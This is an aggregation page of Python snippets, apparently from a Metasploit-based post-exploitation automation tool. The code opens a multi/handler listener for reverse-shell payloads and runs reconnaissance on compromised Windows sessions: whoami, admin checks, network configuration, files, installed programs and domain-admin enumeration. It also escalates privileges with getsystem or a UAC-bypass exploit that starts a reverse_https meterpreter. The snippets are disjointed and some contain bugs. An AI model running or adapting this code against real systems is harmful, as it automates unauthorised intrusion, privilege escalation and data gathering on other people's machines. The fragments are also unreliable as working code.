Esempio n. 1
0
def deleteSessions():
    '''
    deletes all session data
    '''
    Session.objects().delete()
    EscalationData.objects().delete()
    Recon.objects().delete()
    
    
Esempio n. 2
0
 def gatherWhoAmI(self, msfclient, sessionInput):
     EventUtils.settingEvent(self, "Gathering whoami data from session " + sessionInput +".")
     try:
         whoami_input = []
         whoami = msfclient.client.sessions.session(sessionInput).run_psh_cmd("whoami", timeout=30)
         session = Session.objects(_id=sessionInput).first()
         if session:
             recon = Recon.objects(session_id=sessionInput).first()
             if recon:
                 whoami_input = whoami.splitlines()
                 recon.whoami = whoami_input[1]
             else:
                 recon = Recon()
                 recon.session_id = sessionInput
                 recon._id = sessionInput
                 session.recon_id.append(recon.session_id)
                 for lines in whoami.splitlines():
                     if lines == '':
                         pass
                     else:
                         recon.whoami = lines
         recon.save()
         session.save()
         EventUtils.settingEvent(self, "whoami data for session " +sessionInput+ ": " +recon.whoami+".")
     except MsfError:
         print(f"[!]Session {sessionInput} threw timeout error.")
         print("[!]Killing session...")
         msfclient.client.consoles.console(msfclient.console).write(f'sessions -k {sessionInput}')
         time.sleep(10)
         pass
     except Exception as msg:
         logger.info(msg)
         print("There was an error!")
         pass
Esempio n. 3
0
 def gatherCurrentAdmin(self, msfclient, sessionInput):
     EventUtils.settingEvent(self, "Gathering current admin on session " + sessionInput + ".")
     try:
         admin = msfclient.client.sessions.session(sessionInput).run_psh_cmd("net sessions", timeout=30)
         session = Session.objects(_id=sessionInput).first()
         if session:
             recon = Recon.objects(session_id=sessionInput).first()
             if recon:
                 for lines in admin.splitlines():
                     if not 'Access is denied.' in lines:
                         recon.isAdmin = True
                     else:
                         recon.isAdmin = False
             else:
                 recon = Recon()
                 recon.session_id = sessionInput
                 recon._id = sessionInput
                 session.recon_id.append(recon.session_id)
                 for lines in admin.splitlines():
                     if not 'Access is denied.' in lines:
                         EventUtils.settingEvent(self, "Session "+sessionInput+" is admin.")
                         recon.isAdmin = True
                     else:
                         EventUtils.settingEvent(self, "Session "+sessionInput+" is not admin.")
                         recon.isAdmin = False
         recon.save()
         session.save()
     except MsfError:
         print(f"[!]Session {sessionInput} threw timeout error.")
         print("[!]Killing session...")
         msfclient.client.consoles.console(msfclient.console).write(f'sessions -k {sessionInput}')
         time.sleep(10)
         pass
Esempio n. 4
0
    def __init__(self, msfclient):
        self.msfclient = msfclient
        # starting mongo
        global_init()
        # clearing sessions for new sessions
        svc.deleteSessions()

        print("[!]Starting Automation...")
        EventUtils.settingEvent(self, "Starting automation!")
        msfrpcdHandler()
        if self.msfclient.connect() is False:
            sys.exit()
        
        sessionMod(self.msfclient).sessionPrint() # NEED TO IMPROVE THIS

        session = Session.objects()
        if session:
            sessionMod(self.msfclient).activeSessionController()
        else:
            print("[!]Running exploit: exploit/multi/handler")
            exploit = self.msfclient.client.modules.use('exploit', 'exploit/multi/handler')
            time.sleep(5)
            exploit['ExitOnSession'] = False
            time.sleep(2)
            randomPayload = random.choice(self.choose_payload)
            print("[!]Using payload: ", randomPayload)
            _payload = self.msfclient.client.modules.use('payload', randomPayload)
            time.sleep(2)
            _payload['LHOST'] = '0.0.0.0'
            _payload['LPORT'] = '4444'
            time.sleep(5)
            exploit.execute(payload=_payload)
            print("[!]Executing exploit on port ", _payload['LPORT'])
            time.sleep(10)
            sessionMod(self.msfclient).activeSessionController()
Esempio n. 5
0
def checkDisconnected(dictionary):
    '''
    checks if a session is disconnected
    '''
    if not session_list:
        pass
    else:
        if not dictionary:
            for s in session_list:
                session = Session.objects(_id=s).first()
                session.isDisconnected = True
                session.save()
        for s_id in session_list:
            if s_id not in dictionary.items():
                session = Session.objects(_id=s_id).first()
                session.isDisconnected = True
                session.save()
Esempio n. 6
0
    def gatherFiles(self, msfclient, sessionInput):
        EventUtils.settingEvent(self, "Gathering file info from session " + sessionInput + ".")
        try:
            desc_files = ['Mode', 'Size', 'Type', 'Last', 'Modified', 'TimeZone', 'Name']
            listofFiles = msfclient.client.sessions.session(sessionInput).run_with_output('ls', timeout=30).splitlines()
            session = Session.objects(_id=sessionInput).first()
            if session:
                recon = Recon.objects(_id=sessionInput).first()
                if not recon:
                    Reconnaissance.gatherPWD(self, msfclient, sessionInput)
                    recon = Recon.objects(_id=sessionInput).first()
                directory = Recon.objects().filter(directory__dir_name=recon.pwd)
                if directory:
                    for r in directory:
                        for d in r.directory:
                            if not d.gathered:
                                d.gathered = True
                                for f in listofFiles:
                                    file = self.parseFileData(f)
                                    if not file:
                                        pass
                                    else:
                                        files_mapped = dict(zip(desc_files, file))
                                        d.files.append(files_mapped)
                                r.save()
                            else:
                                current_files = []
                                for _dict in d.files:
                                    current_files.append(_dict['Name'])
                                for f in listofFiles:
                                    file = self.parseFileData(f)
                                    if not file:
                                        pass
                                    else:
                                        #First check if the file is in the dict
                                        if file[6] in current_files:
                                            for found_dict in d.files:
                                                if file[6]==found_dict['Name']:
                                                    self.checkingFileChanges(file, found_dict)
                                                else:
                                                    pass
                                        else:
                                        #if not, add the new file info in the dict
                                            files_mapped = dict(zip(desc_files, file))
                                            d.files.append(files_mapped)

                            r.save()
        except MsfError:
            print(f"[!]Session {sessionInput} threw timeout error.")
            print("[!]Killing session...")
            msfclient.client.consoles.console(msfclient.console).write(f'sessions -k {sessionInput}')
            time.sleep(10)
            pass
        except Exception as msg:
            logger.info(msg)
            print(msg)
            pass
Esempio n. 7
0
 def gatherDomain(self, msfclient, sessionInput):
     try:
         EventUtils.settingEvent(self, "Gathering domain info from session " + sessionInput + ".")
         domain = ""
         user_list = {'User': '******', 'IP': '0.0.0.0'}
         domain_user = []
         post = msfclient.client.modules.use('post', 'windows/gather/enum_domain')
         post['SESSION'] = sessionInput
         cid = msfclient.console
         run_enum_domain = msfclient.client.consoles.console(cid).run_module_with_output(post)
         for line in run_enum_domain.splitlines():
             if '[-]' in line:
                 print("[-] Issue gathering domain info!")
             else:
                 if line.find("Domain: ") != -1:
                     domain = line.split("Domain: ",1)[1]
                 elif line.find("Controller: ") != -1:
                     domain_user_info = line.split("Controller: ", 1)[1].split()
                     user_list['User'] = domain_user_info[0].upper()
                     user_list['IP'] = domain_user_info[2].replace(')', '')
                 else:
                     print("[-] Issue gathering domain info!")
         post = msfclient.client.modules.use('post', 'windows/gather/enum_domain_group_users')
         post['GROUP'] = 'domain admins'
         post['SESSION'] = sessionInput
         run_enum_domain_group_users = msfclient.consoles.console(cid).run_module_with_output(post)
         for line in run_enum_domain_group_users.splitlines():
             if domain in line:
                 users = line.split('\\')[1]
                 if 'not' in users:
                     pass
                 else:
                     domain_user.append(users)
         session = Session.objects(_id=sessionInput).first()
         if session:
             recon = Recon.objects(_id=sessionInput).first()
             if recon is None:
                 recon = Recon()
                 recon_domain = ReconDomain()
                 recon_domain.domain = domain
                 recon_domain.domain_controller = user_list
                 recon_domain.domain_user = domain_user
         recon.save()
     except MsfError:
         print(f"[!]Session {sessionInput} threw timeout error.")
         print("[!]Killing session...")
         msfclient.client.consoles.console(msfclient.console).write(f'sessions -k {sessionInput}')
         time.sleep(10)
         pass
     except Exception as msg:
         print(msg)
Esempio n. 8
0
 def getElevated(self, msfclient, sessionInput):
     try:
         EventUtils.settingEvent(
             self, "Trying to get elevated on session" + sessionInput + ".")
         session = Session.objects(_id=sessionInput).first()
         if session:
             esc = EscalationData.objects(_id=sessionInput).first()
             if esc:
                 EventUtils.settingEvent(
                     self,
                     "[" + sessionInput + "] You currently own the system.")
                 print("[!]You own the system.")
             else:
                 EventUtils.settingEvent(
                     self, "[" + sessionInput +
                     "] Attempting to elevate via getsystem...")
                 esc = EscalationData()
                 getsystem = msfclient.client.sessions.session(
                     sessionInput).run_with_output(
                         'getsystem').splitlines()
                 if '[-]' in getsystem[0]:
                     EventUtils.settingEvent(
                         self, "[" + sessionInput +
                         "] Attempting bypassuac_comijack...")
                     print(
                         "[!]Failed getsystem. Trying bypassuac_comijack..."
                     )
                     exploit = msfclient.client.modules.use(
                         'exploit',
                         'exploit/windows/local/bypassuac_comhijack')
                     exploit['SESSION'] = int(sessionInput)
                     payload = msfclient.client.modules.use(
                         'payload', 'windows/x64/meterpreter/reverse_https')
                     payload['LHOST'] = "0.0.0.0"
                     payload['LPORT'] = 4444
                     exploit.execute(payload=payload)
                     esc.getsystem = True
                     session.esc_id.append(esc._id)
                 else:
                     EventUtils.settingEvent(
                         self, "[" + sessionInput +
                         "] You currently own the system.")
                     print("[+]Gained system. Start gaining info")
                     session.esc_id.append(esc._id)
                     esc.getsystem = True
                 esc.save()
                 session.save()
     except Exception as msg:
         print(msg)
         pass
Esempio n. 9
0
 def gatherInstalledPrograms(self, msfclient, sessionInput):
     try:
         EventUtils.settingEvent(self, "Gathering installed program info from session " + sessionInput +".")
         program_desc = ['Name', 'Version']
         current_programs = []
         session = Session.objects(_id=sessionInput).first()
         msfclient.client.sessions.session(sessionInput).write('run post/windows/gather/enum_applications')
         time.sleep(10)
         run_post = msfclient.client.sessions.session(sessionInput).read()
         listofPrograms = run_post.splitlines()
         if session:
             recon = Recon.objects(_id=sessionInput).first()
             if recon is None:
                 recon = Recon()
                 recon._id = sessionInput
                 recon.session_id = sessionInput
                 session.recon_id.append(recon.session_id)
             else:
                 for p in listofPrograms:
                     program = self.parseProgramList(p)
                     if not program:
                         pass
                     else:
                         programs_mapped = dict(zip(program_desc, program))
                         if not recon.gathered_programs:
                             recon.installedprg.append(programs_mapped)
                         else:
                             for list in recon.installedprg:
                                 for key, value in list.items():
                                     if key in programs_mapped:
                                         pass
                                     else:
                                         recon.installedprg.append(programs_mapped)
             recon.gathered_programs = True
         recon.save()
         session.save()
     except MsfError:
         print(f"[!]Session {sessionInput} threw timeout error.")
         print("[!]Killing session...")
         msfclient.client.consoles.console(msfclient.console).write(f'sessions -k {sessionInput}')
         time.sleep(10)
         pass
     except Exception as msg:
         logger.info(msg)
         print(msg)
         pass
Esempio n. 10
0
 def gatherNetwork(self, msfclient, sessionInput):
     EventUtils.settingEvent(self, "Gathering network info on session " + sessionInput + ".")
     try:
         session = Session.objects(_id=sessionInput).first()
         ip = msfclient.client.sessions.session(sessionInput).run_psh_cmd("ipconfig /all", timeout=30)
         if session:
             recon = Recon.objects(session_id=sessionInput).first()
             if recon:
                 self.parseIPData(recon, ip)
             else:
                 recon = Recon()
                 recon.session_id = sessionInput
                 recon._id = sessionInput
                 session.recon_id.append(recon.session_id)
                 self.parseIPData(recon, ip)
         recon.save()
         session.save()
     except MsfError:
         print(f"[!]Session {sessionInput} threw timeout error.")
         print("[!]Killing session...")
         msfclient.client.consoles.console(msfclient.console).write(f'sessions -k {sessionInput}')
         time.sleep(10)
         pass
Esempio n. 11
0
 def gatherPWD(self, msfclient, sessionInput):
     EventUtils.settingEvent(self, "Gathering pwd from session " + sessionInput + ".")
     try:
         current_pwd = msfclient.client.sessions.session(sessionInput).run_with_output('pwd', timeout=30)
         session = Session.objects(_id=sessionInput).first()
         if session:
             recon = Recon.objects(session_id=sessionInput).first()
             if recon:
                 if recon.pwd == current_pwd:
                     pass
                 else:
                     recon.pwd = current_pwd
                     reconfiles = ReconFiles()
                     reconfiles.dir_name = current_pwd
                     recon.directory.append(reconfiles)
             else:
                 recon = Recon()
                 recon.session_id = sessionInput
                 recon._id = sessionInput
                 session.recon_id.append(recon.session_id)
                 recon.pwd = current_pwd
                 reconfiles = ReconFiles()
                 reconfiles.dir_name = current_pwd
                 recon.directory.append(reconfiles)
         recon.save()
         session.save()
     except MsfError:
         print(f"[!]Session {sessionInput} threw timeout error.")
         print("[!]Killing session...")
         msfclient.client.consoles.console(msfclient.console).write(f'sessions -k {sessionInput}')
         time.sleep(10)
         pass
     except Exception as msg:
         logger.info(msg)
         print("There was an error!")
         pass